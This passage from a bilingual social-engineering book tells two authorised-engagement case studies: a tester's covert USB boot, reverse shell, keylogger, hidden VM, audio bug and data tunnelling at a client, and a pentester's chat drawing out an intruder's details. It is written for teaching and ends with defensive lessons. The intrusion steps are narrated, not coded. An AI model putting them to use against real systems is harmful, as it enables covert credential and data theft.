By shutting the blinds and leaving the lights off, he felt he would be protected a bit from the potential of being caught. In his social engineer kit he carried a wide variety of tools and clothing. One of the tools he always had with him on these types of gigs was a USB key that was loaded with a bootable Linux distribution such as BackTrack. In the BackTrack install is a preloaded version of Virtual Box, a free open source virtual machine tool.

 

他使用管理员电脑的后置 USB 端口将 BackTrack 加载到电脑中。进入 BackTrack 后,他通过 SSH 连接到自己的服务器,设置监听器,然后使用从管理员电脑启动的反向 shell 重新连接到服务器。然后,他在 BackTrack 中启动了一个键盘嗅探器(用于记录在电脑上输入的所有按键),并设置要通过 SSH 连接到电脑的日志文件。

He loaded the admin’s computer, using a rear USB port, into BackTrack. After he was in BackTrack, he connected to his own servers via SSH, set up a listener, then connected back to it using a reverse shell he initiated from the admin machine. Then he started a keysniffer (to log all keystrokes typed on the computer) in BackTrack and set up the log file to be dumped through the SSH connection to his computer.

 

然后他做了一件真正有害的事情。他打开 Virtual Box 并创建了一个 Windows 虚拟机 (VM),使用本地硬盘作为物理启动介质,然后加载了该 VM。它自动加载了管理员的用户配置文件和操作系统。在登录屏幕上,他将 VM 加载为全屏模式,隐藏了所有栏,并将现有的退出 VirtualBox 热键变成了一个长得离谱的组合键。这可以防止用户误按该组合键并暴露他们被黑客入侵。

Then he did something truly pernicious. He opened Virtual Box and created a Windows virtual machine (VM), using the local hard drive as the physical media to boot from, and loaded the VM. Automatically, it loaded the admin’s user profile and OS. At the login screen he loaded the VM to be in full screen mode, hid all bars, and made the existing hot key to exit VirtualBox some ridiculously long combo. This protects the user from mistakenly hitting that combo and revealing they are hacked.

 

风险仍然存在,他随时可能被抓住使用这种方法,即使用后置 USB 密钥加载虚拟机,使用自己的硬盘,但如果成功,他将获得管理员输入的每一个按键,并在可怜的家伙的电脑上获得一个 shell,让 Tim 可以访问所有内容。即使 shell 在虚拟机上,他也会记录所有按键,然后使用捕获的用户名和密码访问受害者的机器。

A risk still existed that he could be caught at any moment using this method of a rear USB key loading a virtual machine using their own hard drive, but if it worked he would get every keystroke the admin typed and a shell on the poor guy’s computer, giving Tim access to everything. Even though the shell would be on the virtual machine, he would be logging all his keystrokes and then gain access to the victim’s machine using his captured username and password.

 

蒂姆在办公室里还做了其他几件事,比如在另一台机器上建立连接,这样他就可以远程访问网络。他还设置了一个远程监听设备,这种设备使用手机 SIM 卡。他可以用地球上的任何电话拨打该设备的号码,并在 20 英尺半径范围内的任何地方监听对话。

Tim did a few other things in the office such as set up a connection on another machine, which gave him network access remotely. He also set up a remote listening device, the kind that uses a cell phone SIM card. He could call its number from any phone on earth and listen to conversations from anywhere in a 20-foot radius.

 

几个小时后,蒂姆离开了目标公司的办公室,回到了自己的办公室。他很兴奋地想看看这一切是否有效,但他还有一些想法要尝试。

After just a few hours Tim left the target’s company and went back to his office. He was excited to see whether this all worked, but he still had a few more ideas to try.

 

第二天一早,他确认远程连接仍然正常,然后拨通监听器,听一听人们清晨走进办公室的嗡嗡声。他等着看第一批计算机日志是否传来,获取管理员的用户名和密码,心中的期待越来越强烈。

Early the next morning he made sure his remote connections were still alive and he dialed into his listener to hear the early morning buzz of people coming into the office. The anticipation built as he waited to see whether first computer logs were coming through, capturing the admin’s username and password.

 

大约一个小时后,Tim 看到一些日志传过来。他知道自己不想做任何会危及连接的事情,所以他等待着。大约 12:15 时,日志停止了,所以他推测管理员一定是在吃午饭。他迅速检查了自己的反向 shell,并开始使用从管理员那里获取的服务器密码,从管理员的机器到服务器再到自己的机器创建隧道

About one hour later Tim saw some logs coming through. He knew that he didn’t want to do anything that would compromise his connection, so he waited. Around 12:15 the logs stopped, so he figured the admin must be at lunch. He quickly checked his reverse shell and began to create a tunnel from the admin’s machine to the server back to his machine using the password he captured from the admin for the server

 

隧道接通后,他疯狂地冲刺,在下午 1 点之前尽可能多地复制数据,但那时他没有注意到任何日志,因此他拨打了监听器,并听到有人问:“你知道这次会议要持续多长时间吗?”

After the tunnel was connected he made a mad dash to copy as much as he could before 1:00 p.m. At that time he didn’t notice any logs, so he called into the listener and overheard someone asking, “Do you know how long this meeting is supposed to last?”

 

考虑到管理员可能正在开会,他又尝试了一次更大的传输。大约 30 分钟后,他注意到了一些活动,于是他停止了数据收集,决定等到稍后再做。他不想因为进行大额传输而减慢连接速度,从而让管理员发现任何可疑的情况。他开始仔细检查从服务器抓取的内容,知道自己中了大奖。

Figuring the admin might be at a meeting he made another attempt at a larger transfer. After about 30 minutes he noticed some activity so he stopped data collection and decided to wait until later. He didn’t want to alert the admin to anything fishy going on by slowing down his connection through a large transfer. He started to sift through what he grabbed from the server, knowing he hit the jackpot.

 

他的工作还没有结束。那天晚上,他又进行了一次大规模转账,尽可能多地转账,然后再次前往公司办公室,像以前一样通过社交工程进入。一进去,他就去了行政办公室,这次办公室锁上了,关上了。他用一把推刀(见第 7 章)进去了。

His job wasn’t over yet. That evening he did one more massive transfer, taking as much as he could get and then headed over to the company’s office again, social engineering his way in as he did before. Once in he headed over to the admin’s office, which was locked this time and pulled shut. He used a shove knife (see Chapter 7) to get in.

 

进入办公室后,他关闭了虚拟机,拔下 USB 密钥后重启了机器,然后他按照来时的路线离开了管理员办公室。他收拾好监听器,确保他的音轨被覆盖。

Once inside he turned off the virtual machine, then rebooted the machine after removing the USB key, and then he left the admin’s office the way he found it. He collected his listener and made sure his tracks were covered.

 

他离开大楼,回到办公室整理调查结果。当然,在报告会议上,他带着一叠打印的文件和一个装满他能复制的内容的硬盘走了进来。这足以让房间里的每个人都大吃一惊。

He exited the building to go back to his office and compile his findings. Of course, at the report meeting he walked in with a stack of printed documents and a hard drive full of what he was able to copy. This was enough to drop the jaws of every person in the room.

 

将 SE 框架应用于 Top Secret 1

Applying the SE Framework to Top Secret 1

 

这个故事给我们很多教训。这是一个完美的社会工程师的典范。它可以总结为练习、准备,当然还有信息收集。我们可以想象他练习过他使用的所有技能,从使用推刀和挖隧道到有效的借口和信息收集。

This story offers many lessons. It is an example of a perfect social engineer. It can be summed up as practice, preparation, and, of course, information gathering. All the skills he used we can imagine he practiced, from using a shove knife and creating tunnels to effective pretexting and information gathering.

 

我再三强调信息收集的重要性。我知道我已经说了一千遍了,但如果 Tim 没有掌握适当的信息,整个交易就会失败。

I cannot reiterate enough the importance of information gathering. I know I have said it a thousand times, but this whole deal would have fallen through without Tim having the appropriate information.

 

通过电话联系和现场访问做好准备,并拥有合适的硬件,最终取得了成功。通过分析这次黑客攻击,您可以看到社会工程学的一些基本原理。

Being prepared through phone calls and onsite visits, and having the right hardware, led to success. Analyzing this hack, you can see some of the fundamental principles of social engineering at play.

 

蒂姆是信息收集方面的高手,他利用网络资源收集各种重要信息,在电话中熟练掌握诱导技巧,在面对面时也拥有高超的说服技巧。这些技巧使他能够收集到非熟练黑客可能留下的数据。

Tim was a master at information gathering, using web resources to pull up all sorts of nuggets, expert elicitation skills while on the phone, as well as masterful persuasion skills in person. These techniques allowed him to gather data that probably would have been left behind by an unskilled hacker.

 

信息收集为蒂姆提供了提出什么类型的借口和问题的基础。

Information gathering gave Tim the foundation for what types of pretexts and questions to develop.

 

翻找垃圾桶的计划非常精确。他有可能在没有穿衬衫和预约的情况下被允许进入吗?当然。但他做事的方式有多强大?他从不让他们产生任何怀疑,他让与他互动的每个人都可以做自己的事情,从不三思而后行。这是一个完美的借口,当一个人可以与你互动而没有任何危险信号或警告信号时。蒂姆就是这样做的,这让他可以自由地四处走动,就像他属于这里一样。

The dumpster dive was planned with surgical precision. Does a chance exist that he would have been let in without the shirt and appointment? Sure. Yet how much more powerful was the way he did it? He never left a doubt in their minds and he enabled each person he interacted with to go about their business and never think twice. That is a perfect pretext, when a person can interact with you without any red flags or warning signs going up. Tim did that and it gave him freedom to move around as if he belonged.

 

故事最精彩的部分是他进入大楼后发生的事情。存在如此大的误差空间,他可以通过多种方式被抓住。当然,他可以跑进去,从服务器上获取数据,然后离开,可能没人能阻止他,但他这样做意味着公司永远不知道他们的机密是如何泄露的,也永远不会知道他们被泄露了。

The best part of the story is what happened after he got in the building. Such a large margin for error existed, and he could have been caught so many ways. Sure he could have run in, grabbed the data off the server, and left, and probably no one would have stopped him, but doing it the way he did meant the company never knew how their secrets got out and would never have known they were compromised.

 

蒂姆让管理员的电脑运行虚拟机,这冒了很大的风险。这种操作可能会以多种方式失败。如果有人重启电脑,或者电脑崩溃了,或者管理员误按了那个疯狂的组合键,那么黑客攻击就可能结束,并提醒公司电脑已被入侵。

Tim took a huge risk when he left the admin’s computer running a VM. That particular maneuver could have failed in many ways. If someone had ever rebooted the computer or it had crashed, or if by mistake the admin pressed that crazy key combo, it could have spelled the end to the hack and alerted the company that it had been compromised.

 

我本可以采取另一种风险较小的方法,比如使用自定义 EXE 创建从他的计算机到我的服务器的反向隧道,这样就不会被防病毒软件检测到,也不会出现在计算机的启动脚本中,这样失败的可能性就更小,但蒂姆的方法却是一种非常性感的社会工程黑客手段。

I might have taken a different, less-risky route, one where I could have created a reverse tunnel from his computer back to my servers using a custom EXE that would not be detected by antivirus software and in the startup scripts of the computer, something with less chance of failure, but Tim’s method had the flair of being a very sexy social engineering hack.

 

或许从这次黑客攻击中可以学到不止一个教训,但如果有什么的话,黑客的古老格言“不要相信任何人”在某种程度上是适用的。如果有人打电话说克里斯汀授权了一次垃圾箱检查,而你没有从她那里听到这个消息或收到一份备忘录,那就给她打电话问问。晚上关掉你的电脑,一定要让你的重要机器在没有密码的情况下无法从 USB 启动。

Probably more than one lesson can be learned from this particular hack, but if anything, the old hacker adage of “trust no one” can be applied to some extent. If someone calls to say that Christine authorized a dumpster inspection and you didn’t hear it from her or a memo, call her and ask. Turn your computers off at night and definitely make your important machines not able to boot from USB without a password.

 

当然,这些额外的预防措施意味着更多的工作和更长的加载时间。它们是否值得做取决于这些机器背后的数据有多重要。在这种情况下,这些数据足以毁掉这家公司,所以保护措施应该是极端的。尽管该公司采取了许多出色的预防措施,比如在服务器区域使用全盘加密、摄像头、生物识别锁等,但它并没有保护那些可以访问最重要数据的计算机,这就是导致公司倒闭的原因。

Sure, these extra precautions will mean more work and longer load times. Whether they’re worth doing depends on how important the data that sits behind those machines is. In this case, the data was able to ruin this company, so the protection should have been extreme. Although the company took many excellent precautions, like using full disk encryption, cameras, biometric locks, and so on around the server area, it did not secure the computers that had access to the most important data, and that is what led to the company’s demise.

 

绝密案例研究 2:利用社交工程攻击黑客

Top-Secret Case Study 2: Social Engineering a Hacker

 

打破常规和快速思考是社会工程师的必备素质,因此很少会出现让专业社会工程师束手无策的情况。当渗透测试人员被要求在没有任何事先警告的情况下戴上社会工程学帽子时会发生什么?

Thinking outside the box and having to think fast is standard fare for a social engineer, so it is rare to be in a situation that will challenge the professional social engineer to the point of being stumped. What happens when a penetration tester is called on to put on a social engineering hat without prior warning?

 

下面的这个例子准确地说明了这种情况发生时会发生什么。这是一个很好的例子,说明事先练习某些社会工程技能在被要求毫无预警地使用时非常有用。

This next account shows exactly what happens when this situation arises. It is a good example of how having certain social engineering skills practiced beforehand can be very useful when called on to use them without warning.

 

目标

The Target

 

“John” 被要求为他的一个大客户进行标准网络渗透测试。这是一次毫无新意的渗透测试,因为审计大纲中不包括社会工程和现场工作。尽管如此,他还是喜欢测试客户网络上的漏洞。

“John” was called on for a standard network penetration test for one of his bigger clients. It was a no-thrills pentest as social engineering and onsite work were not included in the audit outline. Still, he enjoyed the work of testing out the vulnerabilities on his clients’ networks.

 

在这次渗透测试中,并没有发生什么特别令人兴奋的事情。他只是在进行常规扫描和记录数据,并测试他认为可能给他提供线索的某些端口和服务。

In this particular pentest nothing really exciting was occurring. He was doing his normal routines of scans and logging data and testing out certain ports and services he felt might give him a lead inside.

 

一天快要结束的时候,他使用 Metasploit 进行了一次扫描,发现了一个开放的 VNC 服务器,该服务器允许控制网络中的其他机器。这是一个不错的发现,因为整个网络都被锁定了,所以这种轻松进入的方式尤其受欢迎。

Near the end of a day he ran a scan using Metasploit that revealed an open VNC server, a server that allows the control of other machines in the network. This is a nice find, because overall the network was locked down so this sort of easy-in is especially welcome.

 

John 正在打开 VNC 会话记录这一发现,突然在后台鼠标开始在屏幕上移动。这是一个巨大的危险信号,因为在一天中的这个时候,没有用户会连接此客户端并将系统用于合法目的。

John was documenting the find with the VNC session open, when suddenly in the background the mouse started moving across the screen. This was a huge red flag, because with this client at this time of the day, no user would be connected and using the system for a legitimate purpose.

 

发生了什么事?他注意到,这个人不像管理员或普通用户,似乎对系统不太了解。他怀疑网络中有一个不受欢迎的入侵者。他不想吓跑入侵者,但他想知道他是管理员还是另一个进入同一系统的黑客。

What could be happening? He noticed that instead of acting like an admin or normal user, this person appeared to be not very knowledgeable about the system. He suspected there was an unwanted intruder in the network. He didn’t want to scare the intruder away but he wanted to know whether he was an admin or another hacker who found his way into the very same system.

 

很快,目标就从他受雇进行渗透测试的公司变成了组织内部的一名流氓黑客。

Quickly the target went from being the company he was hired to pentest to a rogue hacker inside the organization.

 

故事

The Story

 

约翰很快决定,他必须对这名黑客进行社交工程,并获取尽可能多的信息,以帮助保护他的客户。他真的没有时间仔细考虑每一步并制定周密的计划。他没有时间进行适当的信息收集。

John decided quickly that he would have to social engineer this hacker and get as much information as possible to help safeguard his client. He didn’t really have time to think through every step and plan out properly. He didn’t have time to do the appropriate information gathering.

 

他冒着极大的风险打开了记事本。他很快便找借口说自己是个“菜鸟”黑客,一个新手,一个技术不熟练的人,他发现这个盒子打开了,正在破解它,就像这个家伙一样。他能够获得一些对话截图。看一看,注意渗透测试人员是如何对黑客进行社交工程的,如图8-1所示。约翰开始对话,每隔一行都是黑客。

He takes a big risk and opens Notepad. Quickly he develops the pretext that he is a “n00b” hacker, a newbie, someone unskilled, and he found this box open and is hacking it, like this guy. He was able to obtain some screenshots of the conversation. Take a look and notice how the pentester had to social engineer the hacker, as shown in Figure 8-1. John starts the conversation and every other line is the hacker.

 

图8-1:事件实际截图。

Figure 8-1: An actual screen shot of the event.

 
f0801.tif
 

以下是对话的逐字记录。它很长,所有拼写错误和术语都出现在原文中,但记录准确地显示了这次黑客攻击中发生的事情。约翰首先发言。

Following is the verbatim transcript of the conversation that took place. It is long, and all typos and jargon appear in the original, but the transcript shows exactly what transpired in this hack. John speaks first.

 

这是怎么回事?

 

呵呵,只是看看周围

 

是的,我也是。有什么好东西吗?

 

你也是“黑客”?你只是在寻找不安全的 VNC 服务器

 

乌=伊

 

我在寻找一些简单的东西。这个很简单。;) 你在这个网络上看到了其他东西吗?这是我唯一看到的。

 

这里没有找到其他有趣的东西,大多数都相当安全。是的,很容易获得访问权限,但我想要管理员权限... :D

 

是的,从这里开始会很容易。只是一个特权。我对这里的其他内容感兴趣。这个始终可用的电子表格是什么?

 

我不知道,我登录时它就在这里,我没怎么来过。大概 2 小时前发现这台电脑。你呢?

 

我使用它大约一个星期了。断断续续。只是没有用它做任何事情。有点懒。你的 rapid share 测试文件是什么?我只是在上面转储了字符串,没有识别出任何东西。

 

太棒了。好吧,这个文件只是我做的一个测试,想看看我是否可以运行一个服务器(木马)。但防火墙不允许。

 

哈哈。我遇到了同样的问题。我使用了 metasplit shell,但没用。这就是我一直使用这个的原因。你在美国吗?还是在国外?我认识一些丹麦人。

 

其实我来自挪威,呵呵,我在丹麦有亲戚。

 

你挂在什么板上?我以前喜欢一些,但它们已经消失了

 

我主要在一些编程论坛上闲逛,但其他就不多了。你从事黑客行业很久了吗?顺便问一下你几岁了?我 22 岁。

 

我玩这个游戏已经有一年左右了。现在还在上学。16. 只是玩玩而已。你去过 evilzone 吗?

 

没去过。我这样做也主要是为了好玩,只是想看看我能做什么,测试我的技能。顺便说一句,我自己写了“VNC finder”,我找到了很多服务器,但这是唯一一个我可以真正享受乐趣的服务器

 

哇。你用什么写的?我可以下载吗?你有句柄吗?

 

它是用一种叫做 PureBasic 的语言编写的,但还没有准备好发布,它仅供我自己使用。但也许我可以分享它,我可以把代码上传到某个地方让你编译它。前提是你能在某个 warez 网站上找到一些 PureBasic 编译器 :P

 

太棒了。你可以把它放在 irc 上的 pastebin 网站中。这样你就可以匿名发帖了。我以前没有做过 purebasic。只用 python 和 perl

 

让我看看,我会寻找那个 pastebin 网站并上传它,只需给我几分钟,我就会在那里。

 

好的,很酷!你有昵称吗?我会通过 jack_rooby 来

 

处理什么?我很少在 irc 上聊天或做类似的事情,但我可以给你一个电子邮件,你可以通过电子邮件联系我。

 

太棒了。我的意思是像 irc 和 boardz 之类的那样处理。电子邮件也行。

 

是的,在编程板上我会分享我的全名等。现在分享可能还不够聪明。我的电子邮箱是:intruder@hotmail.com

 

给我发个消息或者别的什么,也许我可以在 msn 上添加你。

 

我会给你发消息。当我遇到困难或找到好东西时,能有一个会编程的人来帮我解决这类问题真是太好了

 

呵呵,是的,我们可以组成一个团队:P

 

太棒了!当你完成 pastebin 时请告诉我

 

http://pastebin.ca/1273205

 

顺便说一句...这还处于“alpha”阶段,GUI 还没有真正完成。但可以通过一些变量进行配置。

 

太棒了。我会测试一下,看看能用它做什么。谢谢分享。如果我做了一些很酷的事情,我应该给你发电子邮件吗?

 

是的,请这样做。如果你运行这个程序几个小时,你会发现很多服务器,我甚至尝试编写一些代码来检测没有安全性的服务器,甚至一些有错误的服务器,即使有密码也可以让你登录。这些服务器将在结果(“找到的选项卡”)中显示为“不安全”。但有时它会出错,说有些服务器不安全,但实际上不是,但这种情况并不多,只是为了测试它们。

 

哇。我在这里也看到了其他一些 vnc 服务器,但它们都需要密码。您的工具能让我们进入吗?

 

只有极少数人有可以让你进入的错误,但你必须为他们使用特殊客户端,更多信息请点击此处:

 

http://intruderurl.co.uk/video/

 

下载 zip 文件。

 

Olol,好的,所以我很担心

 

抱歉。好的,我会下载并查看。太棒了。你也是从 rapid share 中编写后门的吗?还是从某个地方获取的?

 

我尝试自己编写大部分工具,这样我就可以学习。所以是的,我自己编写了它,但它还没有完成,我只是想看看我是否可以运行服务器,但它还没有做任何事情,呵呵。

 

我明白了。我有点放弃了,但我想我会回来再尝试一些。我想肯定有一些东西,但我没有自己的僵尸网络可以使用,这个叫 Zoot54 的人试图向我出售一个,有些人为他担保,但我根本不相信他。而且我根本不知道如何编写自己的工具,除了一些 perl 和 python,它们对大多数这样的 Windows 主机不起作用,所以我一直在尝试 metasploit,但收到防火墙错误。你有这方面的计划吗?喜欢做一些很酷的事情吗?还是直接转到下一个?

 

顺便说一句,Perl 和 python 是个不错的开始,我自己还没有用过,但是当你了解一些语言时,你可以轻松地学到更多 :P 也许你应该试试 PureBasic,它实际上真的很容易。呵呵,僵尸网络很酷,我曾考虑过制作一个,但让它传播开来有点困难,至少在 Vista 上是这样。但是,我不能就此放弃这个服务器,我必须再尝试一下,一定有办法获得更多特权 ;D

 

太棒了。你可以拥有这个服务器,因为我已经拥有它一段时间了,但不知道下一步该做什么。如果你愿意的话,请告诉我你在做什么,这样我就可以学到更多。那会很酷。你有 myspace 或 facebook 或什么的吗?或者只是使用电子邮件?

 

电子邮件暂时可用,当我更加信任你时,也许我可以把你加到 Facebook 上,我没有 Myspace。是的,我会及时向你通报最新情况 :)

 

很酷,对我来说很有用。你有 shell 吗,或者你有同样的 gui 吗?它只是一个多连接 vnc 吗?

 

是的,我只是使用了ThightVNC或其他什么,让它不断开其他用户的连接。我真的不是shell迷,呵呵:S

 

很酷。当我获得 shell 时,我经常会犯错误并意外断开连接

 

幸好你没有断开我的连接:D 顺便说一句,当我第一次看到你在胡闹时,我当时就想“该死,管理员来了”,呵呵呵......

 

哈哈,不,我查了一下时区,他们位于美国中部,所以对他们来说现在是半夜。

 

是的,我也做了同样的事。甚至还对互联网连接进行了速度测试,呵呵。他们的上传速度似乎比下载速度快,很奇怪……但也许对国防部的攻击有用。

 

我的意思是 DoS。

 

很奇怪,我不知道这是什么类型的线路,上面写着它来自 co。我觉得这个名字很有趣。你在这里有没有得到过其他系统?我曾经见过一个 warez 服务器,但那是很久以前的事了,现在已经没有了。

 

还没有找到其他系统。但我肯定想访问他们拥有的所有这些网络计算机……该死的很多,这是某种大学。呵呵,我今天早些时候打印了“hello world”。

 

哈哈,你是把它发送到打印机还是屏幕上?如果这些人在大白天看到鼠标在他们身上移动,并且看到那个奇怪的电子表格,他们很可能会发疯

 

哈哈,他们可能疯了,但是哪个傻瓜会在没有密码的情况下运行 VNC 服务器?!我打印到一些打印机上,希望有人看到了。

 

哈哈,那是真的,我敢打赌有些人……他们不能在没有管理员权限的情况下运行它,对吧?所以这不可能只是某个用户做的,必须由具有管理员权限的人来做,否则我们的后门应该可以工作,他们根本就不会运行。或者你认为有人只是更改了配置?

 

嗯,我想你是对的,也许是一些管理员或恶作剧者......

 

你靠这个谋生吗?我一直听说这个可以赚钱,我想如果我做一段时间并且做得好,我可能就能找到一份工作。你是这么做的吗?

 

我靠编程赚过钱,但从来没靠黑客或安全赚过钱。但这是好主意,人们会花钱测试他们的安全,如果我们做得足够好,我们可能就能通过这种方式赚很多钱。

 

这就是我希望的。我买了一本关于道德黑客的书,我认为里面有一些很好的程序。我不知道参加考试的年龄是多少,但如果我参加了考试,这可能是从事这项工作的一个良好开端。里面有一些很好的工具,比如 metasploit。如果你还没有看过的话,你应该看看。

 

是的,谢谢,我应该去看看 :) 但我现在有点累了,呵呵。我不能整天坐在这里用该死的记事本聊天,呵呵呵呵。再见,老兄,很高兴见到你,很有趣。 

 

是的,当我看到屏幕上的快速共享时,我很害怕。很高兴认识你,我会给你发电子邮件,让你知道这个程序是如何工作的。尝试一下看看会发生什么,这很令人兴奋。你保持安全,不要让坏人找到你!

 

呵呵,谢谢,顺便说一下你也一样!:) 这很有趣,顺便说一下,我想我会保存这个记事本日志,给我一秒钟,哈哈......

 

哈哈,对不起

 

再见

 

再见

 

whats up?

 

hehe, just looking around

 

yeah, me too. Anything good?

 

you're a "hacker" too? U was just looking for unsecured VNC servers

 

U=I

 

I was looking forsomething easy. this was easy. ;) You see anything else on this network? This is the only one I got.

 

Didn't find anything else of interest here, most is secured pretty good. Yeah, easy to gain access, but I want admin priviliges... :D

 

Yeah, would be easy from here. Just a priv elev. I am interested inwhat else is here. What is this spreedsheet that is always up?

 

I have no idea, it was heere when I logged in, I havn't been around much. Found this computer 2 hours ago maybe. What about you?

 

I had it for about a week. Off and on. Just did not do anything with it. Sort of lazy. What was your test file from rapid share?I just dumped strings on it and don't reconize anything.

 

Cool. Well, the file was just a test i made, was trying to see if I could get a server (trojan) running. But the firewall didn't allow it.

 

lol. I had the same problem. I did metasplit shell and no-go. Thats why I kept using this. You in the us? or out of country? I know some people in denmark.

 

I'm from Norway actually, hehe, I have relatives in Denmark.

 

You hang in any boards? like I used to like some but they have been going away

 

I mostly hang in some programming boards, but not much else. Have you been into hacking for a long time or what? What's your age btw? I'm 22.

 

I have been on this for like fun for around a year or so. Still in school. 16. Just something to do. You ever go to evilzone?

 

Haven't been there. I too mostly do this for fun, just trying to see what I can do, test my skills. I wrote the "VNC finder" myself btw, I have found a lot of servers, but this is the only one where I could actually have some fun

 

Wow. What did you write it in? Can I dl it? Do you have a handle?

 

It's written in a language called PureBasic, but it's kinda not ready for release yet, it's only for my own use. But maybe I can share it anyway, I could upload the code somewhere and let you compile it. That is if you can find some PureBasic compiler on some warez site :P

 

Thats cool. you can put it in that pastebin site from irc. That lets you anon post I have not done purebasic before. just python and perl

 

Let me see, I'll look for that pastebin site and upload it, just give me some minutes, I'll be around.

 

Ok cool! do you have a handle?I I go by jack_rooby

 

Handle, for what? I don't chat on irc much or anything like that, but I could give you an email you could reah me on.

 

Thats cool. I mean handle like for irc and boardz and the such. heay e-mail works too.

 

Yeah, at the programming board I share my full name, etc. Maybe not too smart to share just yet. My email is: intruder@hotmail.com

 

Send me a message or whatever and I can add you on msn maybe.

 

I will send you a note. It is good to have someone that can program to know for this sort of stuff for when I get stuck or find something good

 

Hehe, yeah, we could be a team :P

 

Cool! let me know when you did the pastebin

 

http://pastebin.ca/1273205

 

btw... that is kinda very in the "alpha" stage, the GUI is not really finished. but it can be configured through some viariables.

 

Cool. I will test it and see what I can do with it. Thanks for sharing. if I do something cool, should I e-mail you?

 

Yeah, please do. If you run this program for some hours you'll find a lot servers, I even tried to make some code to detect servers that has no security and even some that has a bug which can let you log in even if it has a password. These servers will show up in the result (the "found tab") as "insecure". But sometimes it does a mistake and says some are insecure which are not, but that's not many, it's just to test them.

 

Wow. I saw some other vnc servers here too, but they all wanted passwords. Does your tool let us in to that?

 

Just a very few has the bug which can let you in, but you must use the special client for them, more info here btw:

 

http://intruderurl.co.uk/video/

 

Download the zip file.

 

Olol, k, soI wrry

 

sorry. Ok, I will dl that and have a look. Thats cool. Did you write the backdoor from rapid share too? or did you get that from someplace?

 

I try to write most of my tools myself, this way I learn. So yes, I wrote it myself, but it was not finished, I was just wanna see if I could run a server, but it didn't doo anything yet, hehe.

 

I see. I sort of gave up, but I thought I would come back and try some more.I figure there has to be some stuff around but I don't have a botnet of myown to use, this guy named Zoot54 tried to sell me one, and some people vouched for him, but I did not trust him at all. And I don't know how to write my own tools at all other then some perl and python which wont work for most windows hosts like this so I have been tryingthe metasploit but getting the firewall error. Do you have plans for this? Like something cool to do? or just moveon to the next?

 

Perl and python is a good start btw, I haven't been using them myself, but when you know some languages you can easily learn more :P Maybe you should give PureBasic a try, it's really easy actually. Hehe, a bot-net would be cool, I was thinking about making one, but it's kinda hard to make it spread, at least on Vista. But nah, I can't give up this server just yet, I have to try some more, there has to be a way to get more priviliges ;D

 

thast cool. You can have the server as I have had it for a while and don't know what to do next. let me know what you are doing if you would so I can learn some more though. That would be cool. Do you have a myspace or facebook or anything? Or just use the e-mail?

 

E-mail works for now, when I trust you more maybe I can add you on facebook, I don't have myspace. Yeah, I'll keep you updated :)

 

Cool that works for me. Do you have a shell or do you have this same gui? Is it just a multi connection vnc?

 

Yeah, I just used ThightVNC or whatever and made it not disconnect other users. I'm not a shell fan really, hehe :S

 

Cool. When I get a shell a lot of times I makes mistake tand dissconnect on accident

 

Good you didn't dissconnect me :D Btw, when I first saw you messing around I was like "damn, the administrator is here", hehehe...

 

Hah, no I looked up the time zone and they are in the middle of the US so it is the middle of the night for them.

 

Yeah, I did the same thing. Even did a speed test of the internet connection, hehe.They seem to have faster upload speed than download speed, weird... But handy for a DoD attack maybe.

 

DoS, i mean.

 

weird I woner what type of line it is its says it it from co. which I thought was a funny name.. Did you ever get any other systems here? I wonce saw a warez server but that was a long time ago and it is gone now.

 

Haven't found any other systems. But I would sure like to access all these network computers they have... damn many, it's some kind of university. Hehe, I printed out "hello world" previous today.

 

Haha did you send it to a printer or to the screen? these people would more then likkely freak out if they saw the mouse start mooving on them in the middle of the day whith tht weird spreadsheet

 

Haha, they probably woold, but what silly idiots runds a VNC server without a password?! I printed to some of the printers, I hope somebody saw it.

 

Haha thats is true, i bet som.. well they cant run it with out admin privs right? So it cant be just some user that did it, someone with admin would have to do it or else our backdoors should work on it and they are not going at all. Or do you think some one just changed the config?

 

Hmm, well, i think you're right, maybe some admin or prankster..

 

Do you do this work for a living? I keep hearing you can make money with it, and I think if I do this for a while and get to be good I might be able to get a job with it. Is that what you did?

 

I have earned money on programming, but never on hacking or security stuff. But that's a good idea, people would pay to get their security tested and if we get good enough we could probably earn a lot this way.

 

Thats what I hope. I bought a book on the ethical hacker and think that they have some good programs in there. I don't know what the age is to take the test, but if I do take it that might be a good start to do this work. And there are some good tools in there like the metasploit. You should take a look at it if you have not yet.

 

Yeah, thanks, I should check that out :) But I'm getting a little tired now btw, hehe. Can't sit here chatting in bloody notepad all day, hehehehe. So cya later man, cool meeting you, very fun. 

 

Yeah I was scared when I saw the rapid share up on the screen. Cool to meet you and I will e-maiul you and let you know how the program works. Tht is exciting to try that out and see what happens. You stay safe and don't like the bad guys find you!

 

Hehe, thanks, the same for you btw! :) This was interesting, I think I'll save this notepad log btw, give me a sec,lol...

 

there, lol, sorry

 

goodbye

 

bye

 
 

这段聊天记录揭示了约翰在多快的时间内不得不假装成另一个人。这不是一件容易的事,因为通常需要很多计划,但是为了保护他的客户并找出入侵者是谁,他必须扮演“黑客”要他扮演的任何角色。

This chat reveals how quickly John had to pretext and become someone else. This is not an easy task, as usually it takes a lot planning, but to secure his client and find out who this intruder was he had to play whatever role the “hacker” was going to put him in.

 

最后,约翰终于拿到了他的照片、电子邮件和联系信息。他向客户报告了这名恶意黑客,问题得到了解决,不再允许黑客随意进出系统。

In the end, John ended up getting his picture, e-mail, and contact info. He reported this malicious hacker to his client and the problem was fixed to not allow such free reign in and out of its systems.

 

这个绝密案件表明,专业意义上的社会工程学可以在很大程度上保护客户的安全。

This top-secret case shows just how social engineering used in a professional sense can go a long way toward securing the clients.

 

将 SE 框架应用于绝密案例研究 2

Applying the SE Framework to the Top Secret Case Study 2

 

我发现这个帐户中有趣的一点是,这家公司实际上并不是黑客的目标。他只是在互联网上寻找“唾手可得的果实”,而这正是他所发现的。拥有完全访问权限的开放式机器非常危险,这个帐户表明,如果渗透测试人员没有在正确的时间待在那里,可能会造成多大的损失。

What I find interesting in this account is how the company wasn’t really a target for the hacker. He was merely scanning the Internet for “low-hanging fruit” and that is exactly what he found. Open machines with full access are dangerous and this account shows just how much damage could have occurred if the pen tester was not sitting there just at the right time.

 

当然,从这个故事中,我们也学到了很多关于社会工程学的知识。约翰加入这个项目时并没有打算运用他的社会工程学技能。相反,这是一个直接的渗透测试。有时你需要在没有事先计划的情况下运用你的技能。

There is, of course, a lot one can learn about social engineering from this story, too. John did not come into this project with the idea of using his social engineering skills. Instead it was a straight out pentest. Sometimes you are called on to use your skills without being able to plan first.

 

是什么让约翰不用回家练习就能做到这一点?很可能这些技能是约翰每天都会用到的,或者至少他经常练习,使他能够灵活地运用它们。

